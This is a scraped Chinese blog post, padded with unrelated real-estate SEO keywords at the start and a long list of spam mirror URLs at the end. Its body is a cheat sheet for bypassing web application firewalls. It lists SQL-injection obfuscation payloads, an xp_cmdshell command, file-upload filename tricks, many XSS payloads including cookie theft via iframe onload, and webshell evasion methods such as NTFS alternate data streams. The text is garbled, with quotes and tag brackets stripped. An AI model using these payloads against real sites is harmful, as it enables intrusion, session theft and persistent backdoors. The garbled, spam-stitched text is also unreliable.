客源网站,泰安房地产信息网官网,网站建设都有哪些方面,网站 预算1.市场Waf分类 硬件Waf#xff1a;绿盟、安恒、启明、知道创宇等 需要选择模式 透明模式 反向代理分为反向代理#xff08;代理模式#xff09;与反向代理#xff08;牵引模式#xff09; 反向代理又分为两种模式#xff0c;反向代理…1.市场Waf分类 硬件Waf绿盟、安恒、启明、知道创宇等 需要选择模式 透明模式 反向代理分为反向代理代理模式与反向代理牵引模式 反向代理又分为两种模式反向代理代理模式与反向代理牵引模式 旁路监控软件Waf安全狗、云锁、中间件自带的Waf模块云WAF阿里云、安全狗、知道创宇、安恒 2.WAF的检测方法 首先白名单黑名单身份认证--数据包解析--规则判断--拦截 3.身份认证阶段绕过 伪造搜索引擎绕过 伪造白名单的特殊目录 admin/../ 方式绕过 http://10.0.0.139:92/pikachu/pkxss/admin/../pkxss_login.php 4.数据包解析绕过 1、burp安装waf模块 云WAF绕过方法伪造XFF头为127.0.0.1或找出真实IP绕过 安装插件 加一些路径 2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录 3、编码url绕过 输入and 11 将and换位 进行url编码 去掉11 将11换位-1-1 4、修改请求方式绕过利用waf的默认规则绕过如默认只针对拦截不对post拦截 对方支持request 为request就是可以 5、复合参数绕过 http://10.0.0.139:92/sql.php?id1idandid12 6、WAF触发规则的绕过 内联注释代替空格/**/代替空格 http://10.0.0.139:92/sql.php?id1/*|%23--%23|*/and/*|%23--%23|*/-1-1 特殊字符拼接 例如 exec(master..xp_cmdshellnet user)注释包含关键字 /*!*/包含关键词 GET /pen/news.php?id1 /*!union*/ /*!select*/ user,password /*!from*/ mysql.user and /*!1*//*!1*/ # 加是被执行 Lucy order /*!11440 by*/ 1,2# 跟这个数字有关这是一个版本 -1 union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#使用大小写 http://www.***.com/index.php?page_id-15 uNIoN sELecT 1,2,3,4….双写绕过 http://www.***.com/index.php?page_id-15 UNIunionON SELselectECT 1,2,3,4….关键字替换 xor异或绕过 mod绕过 | like|in、group_concat() | concat_ws()、version | version()利用WAF本身的功能绕过利用*代替空格 ,如uni*onsel*ect1,2,3,4....组合法 and /*!11*/ %23 把and为urlencode后为%26%26 如%20%26%26%20-1-2 7、分块传输绕过 支持get 或request 变更请求方法 使用分块传输 0代表传输完成 8.利用其他变量或命令执行语句 and mod(8,7) in (1) and mod(8,7) in (2) 异或运算测注入点xor vince Xor 11 # vince Xor 12 # 5.文件上传绕过 方法一等号绕过 被waf拦截 上传成功 方法二换行绕过 方法三填充垃圾字符 在from-data前加一些垃圾字符 方法四突破0文件名前缀加[0x09]绕过 方法五文件名去掉双引号绕过 6.XSS绕过Waf HTML5 新标签 details%20open%20οntοgglealert(/xss/) details open οntοggletop[prompt](1) details open οntοggletop[al%2bert](1) audio标签 audio srcx οnerrοralert(47) audio srcx οnerrοrprompt(1); audio src1 href1 οnerrοrjavascript:alert(1)/audio video标签 video srcx οnerrοralert(48) video srcx οnerrοrprompt(1); div标签 div stylewidth:expression(alert(/1/))1/div ie浏览器执行 div onmouseover%3dalert%26lpar%3b1%26rpar%3bDIV%2fdiv url编码绕过 math标签 matha/xlink:hrefjavascript:prompt(1)Xss math hrefjavascript:javascript:alert(1)Xss/math button标签 button οnfοcusalert(1) autofocus button/οnclickalert(1) xss/button keygen/οnfοcusprompt(1); keygen标签 keygen οnfοcusjavascript:alert(1) autofocus object标签 object datadata:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg/object base64加密PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg scriptalert(1)/script iframe标签 IFRAME width%3d420 height%3d315 frameborder%3d0 onload%3dalert(document.cookie)%2fIFRAME iframe%2fsrc%3ddata%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d iframe srcdoc%3d%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b 大小写绕过 javascript伪协议 没有分号 Flash Fuzz进行测试 双层标签绕过 7.Webshell免杀(服务端绕过) 用小马传大马(读取文件路径) 小马功能单一大马功能多小马代码少小马作用就是传大码 PHP小马 注释法干扰waf 替换函数 类函数组合法 把马创建成涵数后面只要调用涵数就行 变量覆盖 在线加密 通过NTFS交换数据流文件实现文件隐藏 8.Webshell后门分析
代码分析定位法 抓包分析法 数据流量协议分析法
文章转载自: http://www.morning.yrlfy.cn.gov.cn.yrlfy.cn http://www.morning.jlktz.cn.gov.cn.jlktz.cn http://www.morning.zmlbq.cn.gov.cn.zmlbq.cn http://www.morning.tklqs.cn.gov.cn.tklqs.cn http://www.morning.thlzt.cn.gov.cn.thlzt.cn http://www.morning.lxfdh.cn.gov.cn.lxfdh.cn http://www.morning.bfysg.cn.gov.cn.bfysg.cn http://www.morning.sqdjn.cn.gov.cn.sqdjn.cn http://www.morning.gpfuxiu.cn.gov.cn.gpfuxiu.cn http://www.morning.tssmk.cn.gov.cn.tssmk.cn http://www.morning.c7622.cn.gov.cn.c7622.cn http://www.morning.wqrdx.cn.gov.cn.wqrdx.cn http://www.morning.yrjkz.cn.gov.cn.yrjkz.cn http://www.morning.sqmbb.cn.gov.cn.sqmbb.cn http://www.morning.kjcfz.cn.gov.cn.kjcfz.cn http://www.morning.yymlk.cn.gov.cn.yymlk.cn http://www.morning.tongweishi.cn.gov.cn.tongweishi.cn http://www.morning.dbrdg.cn.gov.cn.dbrdg.cn http://www.morning.rjkfj.cn.gov.cn.rjkfj.cn http://www.morning.fnrkh.cn.gov.cn.fnrkh.cn http://www.morning.tbnn.cn.gov.cn.tbnn.cn http://www.morning.qghjc.cn.gov.cn.qghjc.cn http://www.morning.skrh.cn.gov.cn.skrh.cn http://www.morning.jnrry.cn.gov.cn.jnrry.cn http://www.morning.bsjpd.cn.gov.cn.bsjpd.cn http://www.morning.qqbw.cn.gov.cn.qqbw.cn http://www.morning.yqqxj26.cn.gov.cn.yqqxj26.cn http://www.morning.aishuxue.com.cn.gov.cn.aishuxue.com.cn http://www.morning.khdw.cn.gov.cn.khdw.cn http://www.morning.juju8.cn.gov.cn.juju8.cn http://www.morning.wtnyg.cn.gov.cn.wtnyg.cn http://www.morning.qhqgk.cn.gov.cn.qhqgk.cn http://www.morning.nhbhc.cn.gov.cn.nhbhc.cn http://www.morning.lksgz.cn.gov.cn.lksgz.cn http://www.morning.rqxtb.cn.gov.cn.rqxtb.cn http://www.morning.ngqdp.cn.gov.cn.ngqdp.cn http://www.morning.gzzxlp.com.gov.cn.gzzxlp.com http://www.morning.fkyqm.cn.gov.cn.fkyqm.cn http://www.morning.pmsl.cn.gov.cn.pmsl.cn http://www.morning.btsls.cn.gov.cn.btsls.cn http://www.morning.smsjx.cn.gov.cn.smsjx.cn http://www.morning.ksgjn.cn.gov.cn.ksgjn.cn http://www.morning.rgpy.cn.gov.cn.rgpy.cn http://www.morning.zfqdt.cn.gov.cn.zfqdt.cn http://www.morning.kbqqn.cn.gov.cn.kbqqn.cn http://www.morning.mdjtk.cn.gov.cn.mdjtk.cn http://www.morning.dmjhp.cn.gov.cn.dmjhp.cn http://www.morning.zbtfz.cn.gov.cn.zbtfz.cn http://www.morning.btblm.cn.gov.cn.btblm.cn http://www.morning.kjmcq.cn.gov.cn.kjmcq.cn http://www.morning.zztkt.cn.gov.cn.zztkt.cn http://www.morning.kmldm.cn.gov.cn.kmldm.cn http://www.morning.txkrc.cn.gov.cn.txkrc.cn http://www.morning.grpfj.cn.gov.cn.grpfj.cn http://www.morning.dpqwq.cn.gov.cn.dpqwq.cn http://www.morning.mgzjz.cn.gov.cn.mgzjz.cn http://www.morning.xbkcr.cn.gov.cn.xbkcr.cn http://www.morning.mtzyr.cn.gov.cn.mtzyr.cn http://www.morning.lgnz.cn.gov.cn.lgnz.cn http://www.morning.spfq.cn.gov.cn.spfq.cn http://www.morning.skmzm.cn.gov.cn.skmzm.cn http://www.morning.qyhcg.cn.gov.cn.qyhcg.cn http://www.morning.hdnd.cn.gov.cn.hdnd.cn http://www.morning.jqbmj.cn.gov.cn.jqbmj.cn http://www.morning.gywxq.cn.gov.cn.gywxq.cn http://www.morning.sgbjh.cn.gov.cn.sgbjh.cn http://www.morning.gcxfh.cn.gov.cn.gcxfh.cn http://www.morning.ylqb8.cn.gov.cn.ylqb8.cn http://www.morning.grzpc.cn.gov.cn.grzpc.cn http://www.morning.kwcnf.cn.gov.cn.kwcnf.cn http://www.morning.lwzgn.cn.gov.cn.lwzgn.cn http://www.morning.rlnm.cn.gov.cn.rlnm.cn http://www.morning.wztnh.cn.gov.cn.wztnh.cn http://www.morning.mumgou.com.gov.cn.mumgou.com http://www.morning.kstgt.cn.gov.cn.kstgt.cn http://www.morning.wqmyh.cn.gov.cn.wqmyh.cn http://www.morning.httpm.cn.gov.cn.httpm.cn http://www.morning.jzklb.cn.gov.cn.jzklb.cn http://www.morning.qyxwy.cn.gov.cn.qyxwy.cn http://www.morning.jgmdr.cn.gov.cn.jgmdr.cn
